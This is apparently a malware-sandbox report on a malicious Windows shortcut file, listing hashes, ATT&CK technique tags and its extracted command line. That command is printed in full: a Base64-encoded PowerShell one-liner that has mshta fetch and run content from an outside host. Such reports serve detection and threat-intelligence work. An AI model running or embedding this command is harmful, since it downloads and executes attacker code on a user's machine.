Malicious

d417f07b8eac10d7e14bacae56002256

LNK File | MD5: d417f07b8eac10d7e14bacae56002256 | Size: 1.34 KB | application/x-ms-shortcut

LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated

Characteristics
MD5: d417f07b8eac10d7e14bacae56002256
SHA1: 244452034b44ea99af6dc2217546987898f7a3f4
SHA256: 2feda833dd94e3ff4a1c549814deb6552e162f36023a7aa400104ed528a1e190
SHA384: 9a8588ff1dfd33603ab4ab6f966480670e688b010c09597d99d22c74fcc10a28c83b742404aa344521470ddfa2d4dbca
SHA512: e2b2d061dbb56b4ff8f3ef5f117c600e1464f798a48b195a4aef89db2267ca32b68624bb7fca2ef4f0582836cce755bdbe1b01a7c90c621db74e1cb25704ddd0
SSDeep: 24:8hp/BHYVKVWf+/CWfO0lZseWrN8RqDcCB4PYP+uBarab7Z:8X5a4Tw3JDDc4gFA4aZ
TLSH: 542138140EE20250E1B787757BFDB722C876BC95D95A9BE9014085405B34250F8F5F3F
File Structure
d417f07b8eac10d7e14bacae56002256 | LNK | Malicious | LOLBin | LOLBin:powershell.exe | Execution: CMD in LNK | T1059.003 | T1202: Indirect Command Execution | T1204.002 | Execution: PowerShell in LNK | T1059.001 | PowerShell | Batch Command | PowerShell Call | DeObfuscated | Malicious
LNK CommandLine | PowerShell | Batch Command | PowerShell Call | Contains Base64 Block | Base64 Block | DeObfuscated | Malicious
[PowerShell Command] | PowerShell | DeObfuscated | Contains Base64 Block | Base64 Block | Malicious
[Deobfuscated PS] | DeObfuscated | PowerShell | Malicious
[Base64-Block] | Base64 Block
[Lnk Summary] | Malicious
Artefacts
Name
Value
LNK: Command Execution

powershell.exe powershell -E cwBjAGIAIAAnAG0AcwBoAHQAYQAgACcAOwAoAGcAYwBiACkAIAArACAAJwBoAHQAdABwAHMAOgAvAC8AawByAGkAZQB6AC4AdwBvAHIAawAvAFQAYQB3AGwAZQB5AC4AbQBwADQAJwAgAHwAIABwAG8AdwBlAHIAcwBoAGUAbABsAA==

Deobfuscated PowerShell

-e "cwBjAGIAIAAnAG0AcwBoAHQAYQAgACcAOwAoAGcAYwBiACkAIAArACAAJwBoAHQAdABwAHMAOgAvAC8AawByAGkAZQB6AC4AdwBvAHIAawAvAFQAYQB3AGwAZQB5AC4AbQBwADQAJwAgAHwAIABwAG8AdwBlAHIAcwBoAGUAbABsAA=="
